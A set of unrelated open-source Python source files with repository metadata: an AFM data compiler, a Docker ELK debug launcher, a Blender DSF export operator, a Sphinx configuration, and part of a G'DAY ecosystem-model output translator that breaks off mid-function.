gpl-3.0
| 291
|
import struct
import glob
import argparse

# Concatenate every .afm file in a folder into one .afmdata file whose
# first 4 bytes hold the number of concatenated files (little-endian int,
# as packed by struct 'i' with native byte order).
parser = argparse.ArgumentParser(description="Take a folder with the .AFM files generated by makeBinary.py and compile all the files into one .AFMDATA file")
parser.add_argument("-i", "--input_folder", default="input.scan", help="the path to the input .SCAN file (default: %(default)s)")
args = parser.parse_args()

# Normalize the folder path so it always ends with a slash.
if not args.input_folder.endswith('/'):
    inFolder = args.input_folder + '/'
else:
    inFolder = args.input_folder

countOut = 0
# The output is named after the folder and starts with a placeholder
# count that is patched in once the real number of files is known.
# "with" blocks fix the original's resource leak: file handles were
# never closed on an exception.
with open(inFolder + inFolder.split('/')[-2] + '.afmdata', "wb+") as compiledCoutFile:
    compiledCoutFile.write(struct.pack('i', countOut))
    for outFilePath in glob.glob(inFolder + "*.afm"):
        with open(outFilePath, "rb") as outFile:
            countOut += 1
            compiledCoutFile.write(outFile.read())
    # Rewind and overwrite the placeholder with the real count.
    compiledCoutFile.seek(0)
    compiledCoutFile.write(struct.pack('i', countOut))
|
SINGROUP/readAFM
|
databaseCode/compileOut.py
|
Python
|
gpl-3.0
| 891
|
"""
Copyright (C) 2018 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
# will most likely need to run following on HOST
# sysctl -w vm.max_map_count=262144
# Bootstrap script: verifies the docker SDK and the kernel's
# vm.max_map_count setting, then (re)creates the docker network and
# launches the ELK containers for debugging.
import sys
try:
    from common import common_docker
except ModuleNotFoundError:
    # The docker SDK is a hard requirement; bail out with instructions.
    print('Must install docker via "pip3 install docker". Exiting...', flush=True)
    sys.exit()
# map count limit, vm.max_map_count
# Elasticsearch refuses to start below this kernel limit, so check it
# up front and tell the user how to raise it.
with open('/proc/sys/vm/max_map_count') as f:
    max_map_count = int(f.read())
if max_map_count < 262144:
    print(
        'Map count too small. Run "sysctl -w vm.max_map_count=262144" as root and rerun.'
        ' Exiting...', flush=True)
    sys.exit()
docker_inst = common_docker.CommonDocker()
# get current working directory from host maps
# this is used so ./data can be used for all the containers launched from docker-py
# using reactor since it should always be running
current_host_working_directory = docker_inst.com_docker_container_bind(container_name='/mkreactor',
                                                                       bind_match='/data/certs')
if current_host_working_directory is None:
    print('Please start the containers so path can be found.'
          ' Exiting...', flush=True)
    sys.exit()
# Recreate the docker network from scratch, then start the ELK stack
# bound to the discovered host directory.
docker_inst.com_docker_network_prune()
docker_inst.com_docker_network_create()
docker_inst.com_docker_run_elk(current_host_working_directory)
# docker_inst.com_docker_run_pgadmin()
# docker_inst.com_docker_run_portainer(current_host_working_directory)
|
MediaKraken/MediaKraken_Deployment
|
source/main_debug.py
|
Python
|
gpl-3.0
| 2,125
|
import bpy
import dsf.prop_writer
class ExportDsfProp (bpy.types.Operator):
  """export a dsf prop file.

  Blender operator: opens a file selector (invoke), then writes the
  selected objects as a .duf/.dsf prop via dsf.prop_writer (execute).
  """
  bl_idname = "export_scene.dsf_prop"
  bl_label = "Export Dsf Props"
  # Operator properties, filled in by the file-select dialog / UI.
  filepath = bpy.props.StringProperty\
      ('file path', description = 'file path of the .duf file')
  output_group = bpy.props.StringProperty\
      ('group', description = 'subdirectory for data directory')
  rotate_yup = bpy.props.BoolProperty\
      ('y-up', description = 'rotate y-axis up', default = True)
  export_scale = bpy.props.FloatProperty\
      ('scale', description = 'scale factor for exporting',
       min = 1, max = 1000, soft_min = 1, soft_max = 100, default = 100)
  def execute (self, ctx):
    """export selected objects as dsf."""
    filepath = self.filepath
    output_group = self.output_group
    scale = self.export_scale
    rotate = self.rotate_yup
    dsf.prop_writer.export_prop (ctx, filepath, output_group, scale, rotate)
    return {'FINISHED'}
  def invoke (self, ctx, evt):
    """run the operator interactively.

    Opens Blender's file selector; execute() is called on confirmation.
    """
    ctx.window_manager.fileselect_add (self)
    return {'RUNNING_MODAL'}
def register ():
  # Register the operator class with Blender so it becomes available.
  bpy.utils.register_class (ExportDsfProp)
def unregister ():
  # Remove the operator class from Blender's registry.
  bpy.utils.unregister_class (ExportDsfProp)
def reload ():
  """Development helper: re-import the dsf submodules and re-register.

  NOTE(review): the 'imp' module is deprecated; importlib.reload is the
  modern equivalent.  Submodules are reloaded in dependency order.
  """
  import imp
  import dsf.path_util, dsf.prop_writer, dsf.geom_create, dsf.scene_writer
  import dsf.geom_writer
  imp.reload (dsf.path_util)
  imp.reload (dsf.geom_create)
  imp.reload (dsf.prop_writer)
  imp.reload (dsf.scene_writer)
  imp.reload (dsf.geom_writer)
  # Swap the old operator class for the freshly reloaded one.
  unregister ()
  register ()
|
millighost/dsf-utils
|
modules/dsf/export_prop_op.py
|
Python
|
gpl-3.0
| 1,552
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Python Library documentation build configuration file, created by
# sphinx-quickstart on Fri Aug 19 21:38:54 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../py_lib'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.imgmath',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Python Library'
copyright = '2016, Aman A. Tiwari'
author = 'Aman A. Tiwari'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2'
# The full version, including alpha/beta/rc tags.
release = '1.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# Read the Docs theme; requires the third-party `sphinx_rtd_theme` package
# to be installed at build time.
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = 'Python Library v1.2'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# NOTE(review): Sphinx warns if the '_static' directory does not exist.
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PythonLibrarydoc'
# -- Options for LaTeX output ---------------------------------------------
# Keyword overrides passed straight to the LaTeX builder. Everything is
# left at Sphinx's defaults; the commented entries are kept for reference.
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'PythonLibrary.tex', 'Python Library Documentation',
     'Aman A. Tiwari', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# Section 1: user commands.
man_pages = [
    (master_doc, 'pythonlibrary', 'Python Library Documentation',
     [author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
# NOTE(review): the description is still the scaffold placeholder text.
texinfo_documents = [
    (master_doc, 'PythonLibrary', 'Python Library Documentation',
     author, 'PythonLibrary', 'One line description of project.',
     'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info, reusing the project-level values
# (`project`, `author`, `copyright`) defined near the top of this file.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
# epub_basename = project
# The HTML theme for the epub output. Since the default themes are not
# optimized for small screen space, using the same theme for HTML and epub
# output is usually not wise. This defaults to 'epub', a theme designed to save
# visual space.
#
# epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#
# epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
# epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#
# epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#
# epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#
# epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#
# epub_post_files = []
# A list of files that should not be packed into the epub file.
# The JS-driven search page is useless inside an e-book reader.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#
# epub_tocdepth = 3
# Allow duplicate toc entries.
#
# epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#
# epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#
# epub_fix_images = False
# Scale large images.
#
# epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# epub_show_urls = 'inline'
# If false, no index is generated.
#
# epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
# Use the named-key form ({name: (url, inventory)}): the bare-URL key form
# used previously is deprecated by Sphinx, and a named key also enables
# explicit :external: cross-references.
intersphinx_mapping = {'python': ('https://docs.python.org/', None)}
|
amanabt/pylib
|
source/conf.py
|
Python
|
gpl-3.0
| 12,361
|
#!/usr/bin/env python
# coding: utf-8
""" Translate GDAY output file
Match the NCEAS format and while we are at it carry out unit conversion so that
we matched required standard. Data should be comma-delimited
"""
import shutil
import os
import numpy as np
import csv
import sys
#import matplotlib.pyplot as plt
import datetime as dt
import pandas as pd
#from io import StringIO
from io import BytesIO
__author__ = "Martin De Kauwe"
__version__ = "1.0 (12.05.2014)"
__email__ = "mdekauwe@gmail.com"
def date_converter(*args):
    """Build a datetime from (year, day-of-year) csv fields.

    Each field may arrive as a float-like string (e.g. "2000.0"); it is
    truncated to an int before parsing with the '%Y %j' format.
    """
    year = int(float(args[0]))
    doy = int(float(args[1]))
    return dt.datetime.strptime("%d %d" % (year, doy), '%Y %j')
def translate_output(infname):
    """Translate a G'DAY output file *in place* to the NCEAS csv format.

    Reads `infname`, writes the translated rows to a temp file in
    `../outputs` and then moves it over the original. Unit conversion is
    done inside load_gday_output(); columns the model does not produce
    are written as UNDEF.
    """
    outdir = "../outputs"
    UNDEF = -9999.
    units = setup_units()
    variable, variable_names = setup_varnames()
    # Met input data is currently NOT merged in (the call is disabled), so
    # only G'DAY's own output columns feed the NCEAS file.
    # envir = load_met_input_data(met_fname)
    # load the rest of the g'day output
    (gday, git_ver) = load_gday_output(infname)
    # BUG FIX: previously this was `dict(envir, **gday)`, but `envir` is
    # never defined because load_met_input_data() is commented out above,
    # which raised a NameError at runtime. Use the G'DAY data alone; the
    # missing met columns fall back to UNDEF in the writer loop below.
    data_dict = dict(gday)
    ofname = os.path.join(outdir, "temp.nceas")
    # `with` guarantees the handle is flushed and closed before the move.
    with open(ofname, "w") as f:
        f.write("%s" % (git_ver))
        # write output in csv format
        writer = csv.writer(f, dialect=csv.excel, lineterminator="\n")
        writer.writerow(variable)
        writer.writerow(units)
        writer.writerow(variable_names)
        for i in range(len(gday['DOY'])):
            writer.writerow([("%.8f" % (float(data_dict[k][i]))
                              if k in data_dict else UNDEF)
                             for k in variable_names])
    # Need to replace the temp file with the infname which is actually
    # the filename we want to use
    shutil.move(ofname, infname)
def remove_comments_from_header(fname):
    """Return a text buffer copy of *fname* with '#' comment markers stripped.

    The source files carry '#'-prefixed header lines, which prevents pandas
    from parsing the column names; stripping the marker lets read_csv use
    them directly.

    BUG FIX: the previous version wrote str lines into a BytesIO, which
    raises TypeError on Python 3; pandas accepts a text buffer, so a
    StringIO is the correct container.
    """
    from io import StringIO  # local import: module top only imports BytesIO
    s = StringIO()
    with open(fname) as f:
        for line in f:
            if '#' in line:
                line = line.replace("#", "").lstrip(' ')
            s.write(line)
    s.seek(0)  # "rewind" to the beginning of the buffer for the reader
    return s
def remove_comments_from_header_and_get_git_rev(fname):
    """Strip '#' comment markers from *fname* and capture its first line.

    Returns (text_buffer, first_line). The first line of a G'DAY output
    file holds the git revision stamp; it is returned verbatim (trailing
    spaces stripped, newline kept) and is ALSO written into the buffer, so
    callers skip it with read_csv(..., skiprows=1).

    BUG FIX: writes to a StringIO instead of a BytesIO (str into BytesIO
    raises TypeError on Python 3); also initialises git_ver so an empty
    file cannot raise UnboundLocalError.
    """
    from io import StringIO  # local import: module top only imports BytesIO
    s = StringIO()
    git_ver = ""
    with open(fname) as f:
        for line_counter, line in enumerate(f):
            if line_counter == 0:
                git_ver = line.rstrip(' ')
            if '#' in line:
                line = line.replace("#", "").lstrip(' ')
            s.write(line)
    s.seek(0)  # "rewind" to the beginning of the buffer for the reader
    return s, git_ver
def load_met_input_data(fname):
    """Read a G'DAY met driver file and return the NCEAS-relevant series.

    PAR is converted from MJ to mol; N deposition from t/ha to g/m2;
    morning/afternoon VPD values are averaged into a daily mean.
    """
    MJ_TO_MOL = 4.6
    SW_TO_PAR = 0.48
    DAYS_TO_HRS = 24.0
    UMOL_TO_MOL = 1E-6
    tonnes_per_ha_to_g_m2 = 100.0
    stream = remove_comments_from_header(fname)
    met = pd.read_csv(stream, parse_dates=[[0, 1]], skiprows=4, index_col=0,
                      sep=",", keep_date_col=True,
                      date_parser=date_converter)
    return {
        'CO2': met["co2"],
        'PREC': met["rain"],
        'PAR': (met["par_am"] + met["par_pm"]) * MJ_TO_MOL,
        'TAIR': met["tair"],
        'TSOIL': met["tsoil"],
        'VPD': (met["vpd_am"] + met["vpd_pm"]) / 2.0,
        'NDEP': met["ndep"] * tonnes_per_ha_to_g_m2,
    }
def load_gday_output(fname):
    """Load a G'DAY output csv and map its columns onto NCEAS variable names.

    Returns (data_dict, git_version_line). C/N/P pools and fluxes are
    converted from t/ha to g/m2; water fluxes are in mm, which equals
    kg/m2, so no conversion is needed. Quantities the model does not
    output are filled with UNDEF placeholder lists so the csv writer can
    still emit a full row.

    BUG FIX: the returned dict previously contained the key 'PFRRETR'
    twice ('PCRRETR' was missing, so the coarse-root retranslocation
    entry was silently shadowed), and used 'Gbd' where setup_varnames()
    expects 'GBd'. Both keys now match the variable-name list.
    """
    SW_RAD_TO_PAR = 2.3
    UNDEF = -9999.
    tonnes_per_ha_to_g_m2 = 100
    yr_to_day = 365.25
    (s, git_ver) = remove_comments_from_header_and_get_git_rev(fname)
    out = pd.read_csv(s, parse_dates=[[0,1]], skiprows=1, index_col=0,
                      sep=",", keep_date_col=True, date_parser=date_converter)
    year = out["year"]
    doy = out["doy"]
    # state outputs (pools), converted t/ha -> g/m2 where applicable
    pawater_root = out["pawater_root"]
    shoot = out["shoot"] * tonnes_per_ha_to_g_m2
    stem = out["stem"] * tonnes_per_ha_to_g_m2
    branch = out["branch"] * tonnes_per_ha_to_g_m2
    fine_root = out["root"] * tonnes_per_ha_to_g_m2
    coarse_root = out["croot"] * tonnes_per_ha_to_g_m2
    coarse_rootn = out["crootn"] * tonnes_per_ha_to_g_m2
    litterc = out["litterc"] * tonnes_per_ha_to_g_m2
    littercag = out["littercag"] * tonnes_per_ha_to_g_m2
    littercbg = out["littercbg"] * tonnes_per_ha_to_g_m2
    soilc = out["soilc"] * tonnes_per_ha_to_g_m2
    lai = out["lai"]
    shootn = out["shootn"] * tonnes_per_ha_to_g_m2
    stemn = out["stemn"] * tonnes_per_ha_to_g_m2
    branchn = out["branchn"] * tonnes_per_ha_to_g_m2
    rootn = out["rootn"] * tonnes_per_ha_to_g_m2
    crootn = out["crootn"] * tonnes_per_ha_to_g_m2
    litternag = out["litternag"] * tonnes_per_ha_to_g_m2
    litternbg = out["litternbg"] * tonnes_per_ha_to_g_m2
    nsoil = out["soiln"] * tonnes_per_ha_to_g_m2
    inorgn = out["inorgn"] * tonnes_per_ha_to_g_m2
    tnc = out["cstore"] * tonnes_per_ha_to_g_m2
    nstorage = out["nstore"] * tonnes_per_ha_to_g_m2
    pstorage = out["pstore"] * tonnes_per_ha_to_g_m2
    activesoiln = out["activesoiln"] * tonnes_per_ha_to_g_m2
    slowsoiln = out["slowsoiln"] * tonnes_per_ha_to_g_m2
    passivesoiln = out["passivesoiln"] * tonnes_per_ha_to_g_m2
    npoolo = activesoiln + slowsoiln + passivesoiln
    shootp = out["shootp"] * tonnes_per_ha_to_g_m2
    stemp = out["stemp"] * tonnes_per_ha_to_g_m2
    branchp = out["branchp"] * tonnes_per_ha_to_g_m2
    rootp = out["rootp"] * tonnes_per_ha_to_g_m2
    crootp = out["crootp"] * tonnes_per_ha_to_g_m2
    litterpag = out["litterpag"] * tonnes_per_ha_to_g_m2
    litterpbg = out["litterpbg"] * tonnes_per_ha_to_g_m2
    psoil = out["soilp"] * tonnes_per_ha_to_g_m2
    inorgp = out["inorgp"] * tonnes_per_ha_to_g_m2
    inorglabp = out["inorglabp"] * tonnes_per_ha_to_g_m2
    inorgsorbp = out["inorgsorbp"] * tonnes_per_ha_to_g_m2
    inorgavlp = out["inorgavlp"] * tonnes_per_ha_to_g_m2
    inorgssorbp = out["inorgssorbp"] * tonnes_per_ha_to_g_m2
    inorgoccp = out["inorgoccp"] * tonnes_per_ha_to_g_m2
    inorgparp = out["inorgparp"] * tonnes_per_ha_to_g_m2
    activesoilp = out["activesoilp"] * tonnes_per_ha_to_g_m2
    slowsoilp = out["slowsoilp"] * tonnes_per_ha_to_g_m2
    passivesoilp = out["passivesoilp"] * tonnes_per_ha_to_g_m2
    ppoolo = activesoilp + slowsoilp + passivesoilp
    # fluxes outputs
    beta = out["wtfac_root"]
    nep = out["nep"] * tonnes_per_ha_to_g_m2
    gpp = out["gpp"] * tonnes_per_ha_to_g_m2
    npp = out["npp"] * tonnes_per_ha_to_g_m2
    rh = out["hetero_resp"] * tonnes_per_ha_to_g_m2
    ra = out["auto_resp"] * tonnes_per_ha_to_g_m2
    et = out["et"]  # mm of water' are same value as kg/m2
    trans = out["transpiration"]  # mm of water' are same value as kg/m2
    soil_evap = out["soil_evap"]  # mm of water' are same value as kg/m2
    can_evap = out["canopy_evap"]  # mm of water' are same value as kg/m2
    runoff = out["runoff"]  # mm of water' are same value as kg/m2
    gl = out["cpleaf"] * tonnes_per_ha_to_g_m2
    # gw summed from cpstem and cpbranch below
    cpstem = out["cpstem"] * tonnes_per_ha_to_g_m2
    cpbranch = out["cpbranch"] * tonnes_per_ha_to_g_m2
    gr = out["cproot"] * tonnes_per_ha_to_g_m2
    gcr = out["cpcroot"] * tonnes_per_ha_to_g_m2
    deadleaves = out["deadleaves"] * tonnes_per_ha_to_g_m2
    deadroots = out["deadroots"] * tonnes_per_ha_to_g_m2
    deadcroots = out["deadcroots"] * tonnes_per_ha_to_g_m2
    deadbranch = out["deadbranch"] * tonnes_per_ha_to_g_m2
    deadstems = out["deadstems"] * tonnes_per_ha_to_g_m2
    deadleafn = out["deadleafn"] * tonnes_per_ha_to_g_m2
    deadbranchn = out["deadbranchn"] * tonnes_per_ha_to_g_m2
    deadstemn = out["deadstemn"] * tonnes_per_ha_to_g_m2
    deadrootn = out["deadrootn"] * tonnes_per_ha_to_g_m2
    deadcrootn = out["deadcrootn"] * tonnes_per_ha_to_g_m2
    nup = out["nuptake"] * tonnes_per_ha_to_g_m2
    ngross = out["ngross"] * tonnes_per_ha_to_g_m2
    nmin = out["nmineralisation"] * tonnes_per_ha_to_g_m2
    npleaf = out["npleaf"] * tonnes_per_ha_to_g_m2
    nproot = out["nproot"] * tonnes_per_ha_to_g_m2
    npcroot = out["npcroot"] * tonnes_per_ha_to_g_m2
    npstemimm = out["npstemimm"] * tonnes_per_ha_to_g_m2
    npstemmob = out["npstemmob"] * tonnes_per_ha_to_g_m2
    npbranch = out["npbranch"] * tonnes_per_ha_to_g_m2
    apar = out["apar"] / SW_RAD_TO_PAR
    gcd = out["gs_mol_m2_sec"]
    ga = out["ga_mol_m2_sec"]
    nleach = out["nloss"] * tonnes_per_ha_to_g_m2
    activesoil = out["activesoil"] * tonnes_per_ha_to_g_m2
    slowsoil = out["slowsoil"] * tonnes_per_ha_to_g_m2
    passivesoil = out["passivesoil"] * tonnes_per_ha_to_g_m2
    cfretransn = out["leafretransn"] * tonnes_per_ha_to_g_m2
    deadleafp = out["deadleafp"] * tonnes_per_ha_to_g_m2
    deadbranchp = out["deadbranchp"] * tonnes_per_ha_to_g_m2
    deadstemp = out["deadstemp"] * tonnes_per_ha_to_g_m2
    deadrootp = out["deadrootp"] * tonnes_per_ha_to_g_m2
    deadcrootp = out["deadcrootp"] * tonnes_per_ha_to_g_m2
    pup = out["puptake"] * tonnes_per_ha_to_g_m2
    pgross = out["pgross"] * tonnes_per_ha_to_g_m2
    pmin = out["pmineralisation"] * tonnes_per_ha_to_g_m2
    ppleaf = out["ppleaf"] * tonnes_per_ha_to_g_m2
    pproot = out["pproot"] * tonnes_per_ha_to_g_m2
    ppcroot = out["ppcroot"] * tonnes_per_ha_to_g_m2
    ppstemimm = out["ppstemimm"] * tonnes_per_ha_to_g_m2
    ppstemmob = out["ppstemmob"] * tonnes_per_ha_to_g_m2
    ppbranch = out["ppbranch"] * tonnes_per_ha_to_g_m2
    pleach = out["ploss"] * tonnes_per_ha_to_g_m2
    cfretransp = out["leafretransp"] * tonnes_per_ha_to_g_m2
    # extra traceability stuff
    tfac_soil_decomp = out["tfac_soil_decomp"]
    c_into_active = out["c_into_active"] * tonnes_per_ha_to_g_m2
    c_into_slow = out["c_into_slow"] * tonnes_per_ha_to_g_m2
    c_into_passive = out["c_into_passive"] * tonnes_per_ha_to_g_m2
    active_to_slow = out["active_to_slow"] * tonnes_per_ha_to_g_m2
    active_to_passive = out["active_to_passive"] * tonnes_per_ha_to_g_m2
    slow_to_active = out["slow_to_active"] * tonnes_per_ha_to_g_m2
    slow_to_passive = out["slow_to_passive"] * tonnes_per_ha_to_g_m2
    passive_to_active = out["passive_to_active"] * tonnes_per_ha_to_g_m2
    co2_rel_from_surf_struct_litter = out["co2_rel_from_surf_struct_litter"] * tonnes_per_ha_to_g_m2
    co2_rel_from_soil_struct_litter = out["co2_rel_from_soil_struct_litter"] * tonnes_per_ha_to_g_m2
    co2_rel_from_surf_metab_litter = out["co2_rel_from_surf_metab_litter"] * tonnes_per_ha_to_g_m2
    co2_rel_from_soil_metab_litter = out["co2_rel_from_soil_metab_litter"] * tonnes_per_ha_to_g_m2
    co2_rel_from_active_pool = out["co2_rel_from_active_pool"] * tonnes_per_ha_to_g_m2
    co2_rel_from_slow_pool = out["co2_rel_from_slow_pool"] * tonnes_per_ha_to_g_m2
    co2_rel_from_passive_pool = out["co2_rel_from_passive_pool"] * tonnes_per_ha_to_g_m2
    # extra priming stuff (not simulated here -> placeholder columns)
    rexc = [UNDEF] * len(doy)
    rexn = [UNDEF] * len(doy)
    co2x = [UNDEF] * len(doy)
    factive = [UNDEF] * len(doy)
    rtslow = [UNDEF] * len(doy)
    rexcue = [UNDEF] * len(doy)
    cslo = out["slowsoil"] * tonnes_per_ha_to_g_m2
    nslo = out["slowsoiln"] * tonnes_per_ha_to_g_m2
    cact = out["activesoil"] * tonnes_per_ha_to_g_m2
    nact = out["activesoiln"] * tonnes_per_ha_to_g_m2
    # Misc stuff we don't output
    drainage = [UNDEF] * len(doy)
    rleaf = [UNDEF] * len(doy)
    rwood = [UNDEF] * len(doy)
    rcr = [UNDEF] * len(doy)
    rfr = [UNDEF] * len(doy)
    rgrow = [UNDEF] * len(doy)
    rsoil = [UNDEF] * len(doy)
    cex = [UNDEF] * len(doy)
    cvoc = [UNDEF] * len(doy)
    lh = [UNDEF] * len(doy)
    sh = [UNDEF] * len(doy)
    ccoarse_lit = [UNDEF] * len(doy)
    ndw = [UNDEF] * len(doy)
    pclitb = [UNDEF] * len(doy)
    nvol = [UNDEF] * len(doy)
    gb = [UNDEF] * len(doy)
    grepr = [UNDEF] * len(doy)
    cwretransn = [UNDEF] * len(doy)
    ccrretransn = [UNDEF] * len(doy)
    cfrretransn = [UNDEF] * len(doy)
    plretr = [UNDEF] * len(doy)
    pwretr = [UNDEF] * len(doy)
    pcrretr = [UNDEF] * len(doy)
    pfrretr = [UNDEF] * len(doy)
